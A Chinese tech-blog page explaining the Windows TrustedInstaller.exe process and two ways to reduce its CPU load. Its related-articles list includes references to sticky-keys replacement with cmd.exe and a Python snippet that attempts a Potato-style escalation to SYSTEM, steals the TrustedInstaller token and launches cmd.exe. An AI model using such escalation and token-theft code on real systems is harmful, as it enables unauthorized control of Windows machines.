trustedinstaller.exe是什么进程、…

最新推荐文章于 2025-11-22 15:05:54 发布
原创 最新推荐文章于 2025-11-22 15:05:54 发布 · 6.3k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍TrustedInstaller.exe进程及其可能导致的高CPU占用问题。该进程与Windows Update及系统模块安装有关。文章提供了两种解决方案:一是调整Windows更新设置,二是更改WindowsModuleInstaller服务的启动方式。

TrustedInstaller.exe实际上是“Windows Modules Installer”这个服务的进程,路径位于C:\Windows\servicing\TrustedInstaller.exe。当进行Windows Update,或者安装某些微软发布的安装包时,Windows Modules Installer服务会自动运行,以便可以修改或者替换系统文件。

开机时候“Trustedinstaller.exe”这个进程有时会占用100%的CPU很长时间,TrustedInstaller.exe进程是Windows Vista系统中的安全进程,如果占用率很高如90%或100%是因为Vista/windows7在安装一些系统模块,如Windows Update正在自动下载安装Vista/windows7安全更新,这个期间可能会出现TrustedInstaller.exe进程CPU占用率100%;如果关闭这个进程,会影响系统更新或者更改系统设置的操作。

如果你没有这个耐心,可以有其他两种解决方案。

其一,对自动更新下手。更改Windows更新设置,选择除了"自动更新(推荐)"外的其他三个选项即可。

其二,直指老巢,更改Windows Module Installer服务。

- 要么禁止Windows Module Installer服务随Windows启动:

位置:Win+R->输入MSConfig->服务->取消"Windows Module Installer"前面的选择。

- 要么就直接将其改为手动启动:

位置:控制面板->系统和维护->管理工具->服务。

关于TrustedInstaller权限
qq_70836100的博客
09-24 2770
我们在在删除某些文件时会发现权限不够的情况,那是因为自从 Windows Vista 以来,为了提升安全性,微软对于权限的把控越来越紧。为了对抗恶意软件随意修改系统文件,Trustedinstaller 应运而生。
WINDOWS 2008的trustedinstallerexe占用过多CPU导致服务器性能下降的问题处理
weixin_34228617的博客
03-08 1995
参考贴: http://www.mydigitallife.info/trustedinstallerexe-process-100-high-cpu-usage-in-vista-task-manager-fix/ 最开始,我停掉WINDOWS UPDATE,但没有解决,这个进程还是不时的偶尔冒出来,然后力图将CPU撑到100%,然后,网络性能,DISK I/O,都受影响。 原来,WIND...
删除文件夹,被提示“需要来自 TrustedInstaller 的权限。。。”的解决方案
最新发布
2509_93956100的博客
11-22 801
TrustedInstaller 是一个内置的系统账户,主要用于安装和更新 Windows 操作系统文件。这个账户具有非常高的权限,可以对系统文件和文件夹进行修改,而普通用户和管理员账户通常没有这样的权限。当你尝试删除或修改某些系统文件夹(如 windows.old),系统会提示你需要 TrustedInstaller 的权限,因为这些文件夹最初由 TrustedInstaller 创建,并且只有它具有完全控制的权限。
TrustInstall
weixin_34408717的博客
01-15 355
2019独角兽企业重金招聘Python工程师标准>>> ...
win7启动后trustedinstaller.exe占用cpu过高问题
热门推荐
java_student09的专栏
05-13 1万+
win7启动后trustedinstaller.exe占用cpu过高问题 笔者笔记本电脑操作系统Win7 SP1, 下午系统启动后发现排风位置动作很大,打开任务管理器,发现cpu使用近 100%。
Win10 更新 毒辣万恶占用内存 彻底清除 屡试不爽 删除替换TrustedInstaller.exe 彻底关闭win10 更新必杀技
it520ljj的博客
06-18 1687
win10 删除更新 win10 删除TrustedInstaller.exe 关闭Win10 Win8 更新
Vista下TrustedInstaller.exe进程100%占用CPU的问题
闲云孤鹤
05-21 981
本文转载至: http://think.lenovo.com.cn/htmls/knowledge/detail_12562097621902829.html 问题描述      初装Vista系统之后,TrustedInstaller.exe进程100%占用CPU,系统运行机器非常缓慢。      原因分析     TrustedInstaller.exe其实就是"Win
提权到TrustedInstaller源码
06-02
提权到TrustedInstaller cao进系统进程内存(如lsass.exe winlogon.exe)。调用了Nsudo 开源于 https://github.com/M2Team/NSudo。调用了精易模块。这只是一个启动器,直接注入系统没权限写的。启动器必须以管理员权限...
精选资源
提权到TrustedInstaller-易语言
06-12
提权到TrustedInstaller cao进系统进程内存(如lsass.exe winlogon.exe) 调用了Nsudo 开源于https://github.com/M2Team/NSudo 调用了精益模块 这只是一个启动器,直接注入系统没权限写的( 别乱写东西,出事情不关我事...
卸载wsl.exe 需要trustedInstaller权限
03-30
1. 使用第三方工具(如 Process Hacker 或 PsExec),这些工具可以提升进程到 `TrustedInstaller` 权限级别。 2. 创建计划任务并通过设置让任务以最高权限运行。 #### 方法一:使用 PsExec 提升权限 PsExec 是 ...
TrustedInstaller
06-26
TrustedInstaller.exe 是 Windows 操作系统中的一个关键系统文件,通常与 Windows Update 服务相关联。该进程的权限属于系统账户 `NT SERVICE\TrustedInstaller`,这是一个受限制的服务账户,具有安装和更新系统组件...
获取TrustedInstaller权限
12-07
一键获取Windows8文件所有权限,解决“文件访问被拒绝,你需要TrustedInstaller提供的权限
将粘滞键替换为cmd.exe
07-02
可以将粘滞键的效果替换为打开cmd.exe 在XP下直接可用,在win7下需要先获取sethc.exeTrustedinstaller权限。
获取和去除trustedinstaller权限
05-14
使用windows操作系统时,有时候会要求更高权限,如trustedinstaller权限。
import win32pipe import win32security import win32api import win32con import win32process import subprocess def steal_trustedinstaller_token(): """ 查找并窃取TrustedInstaller进程令牌。 返回TrustedInstaller令牌句柄。 """ import wmi # 需要安装pywin32和WMI库:pip install wmi # 使用WMI枚举进程 c = wmi.WMI() trusted_installer_pid = None for process in c.Win32_Process(): if "TrustedInstaller.exe" in process.Name: trusted_installer_pid = process.ProcessId break if not trusted_installer_pid: raise Exception("未找到TrustedInstaller进程,确保服务已运行(如通过sc start TrustedInstaller)") # 打开进程并获取令牌 PROCESS_QUERY_INFORMATION = 0x0400 h_process = win32api.OpenProcess(PROCESS_QUERY_INFORMATION, False, trusted_installer_pid) if not h_process: raise Exception("打开进程失败") h_token = win32security.OpenProcessToken(h_process, win32security.TOKEN_DUPLICATE | win32security.TOKEN_IMPERSONATE) if not h_token: win32api.CloseHandle(h_process) raise Exception("打开令牌失败") # 复制令牌以用于模拟 duplicated_token = win32security.DuplicateTokenEx( h_token, win32security.TOKEN_IMPERSONATE | win32security.TOKEN_QUERY, None, win32security.SecurityImpersonation, win32security.TokenImpersonation ) # 清理资源 win32api.CloseHandle(h_token) win32api.CloseHandle(h_process) return duplicated_token def impersonate_and_execute(token, command="cmd.exe"): """ 模拟令牌并执行命令。 token: 复制的令牌句柄 command: 要执行的命令 """ # 模拟令牌 win32security.ImpersonateLoggedOnUser(token) # 创建新进程(以TrustedInstaller权限) startup_info = win32process.STARTUPINFO() startup_info.dwFlags = win32con.STARTF_USESHOWWINDOW startup_info.wShowWindow = win32con.SW_SHOW process_info = win32process.CreateProcessAsUser( token, None, # 应用程序名 command, None, None, False, 0, None, None, startup_info ) print(f"[+] 已以TrustedInstaller权限启动: {command}") return process_info def exploit_potato(): """ 使用Potato漏洞提权到SYSTEM权限 返回: SYSTEM令牌句柄 """ pipe_name = r'\\.\pipe\python_potato' h_pipe = win32pipe.CreateNamedPipe( pipe_name, win32pipe.PIPE_ACCESS_DUPLEX, win32pipe.PIPE_TYPE_BYTE | win32pipe.PIPE_WAIT, 1, 65536, 65536, 0, None ) # 触发漏洞利用 subprocess.Popen(['cmd.exe', '/c', 'echo Triggering exploit'], startupinfo=subprocess.STARTUPINFO()) win32pipe.ConnectNamedPipe(h_pipe, None) try: h_token = win32security.OpenThreadToken( win32api.GetCurrentThread(), win32security.TOKEN_ALL_ACCESS, True ) except: h_token = win32security.OpenProcessToken( win32api.GetCurrentProcess(), win32security.TOKEN_ALL_ACCESS ) duplicated_token = win32security.DuplicateTokenEx( h_token, win32security.TOKEN_ALL_ACCESS, None, win32security.SecurityImpersonation, win32security.TokenPrimary ) win32api.CloseHandle(h_pipe) return duplicated_token # 完整流程示例 if __name__ == "__main__": # 1. 提权到SYSTEM system_token = exploit_potato() # 2. 在SYSTEM上下文窃取TrustedInstaller令牌 win32security.ImpersonateLoggedOnUser(system_token) # 临时模拟SYSTEM ti_token = steal_trustedinstaller_token() # 3. 模拟TrustedInstaller并启动cmd impersonate_and_execute(ti_token, "cmd.exe /k whoami") # 输出将显示: NT SERVICE\TrustedInstaller 终端: Triggering exploit 然后就不动了
11-14
# 注意:获取令牌的过程需要利用漏洞提权后从TrustedInstaller进程中获取 # 使用令牌创建进程 create_process_as_user(token_handle, "cmd.exe /c your_command_here") ``` 注意:使用WinAPI需要安装pywin32,并且...
Trustinstall权限提升
SHELLCODE_8BIT的博客
03-15 647
M2Team/NSudo: Series of System Administration Tools (github.com)
msmpeng 禁用_Vista计算机上100%CPU上的MSMPENG.EXETrustedInstaller.exe,SearchIndexer和SLSVC.EXE...
10-02 1224
msmpeng 禁用enjoyed this post, or this blog, please 喜欢这篇文章或博客,请make a secure tax-deductable donation to the American Diabetes Association. Please read 向美国糖尿病协会(American Diabetes Association)进行安全的免税捐赠。 请...
删除有TrustedInstaller权限的文件-亲测有效
qq_35740095的博客
04-15 1657
如何删除有TrustedInstaller权限的文件-亲测有效 win10-https://zhidao.baidu.com/question/1384229736645191820.html win7-https://zhidao.baidu.com/question/1638171775252448820.html?qbl=relate_question_6 ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值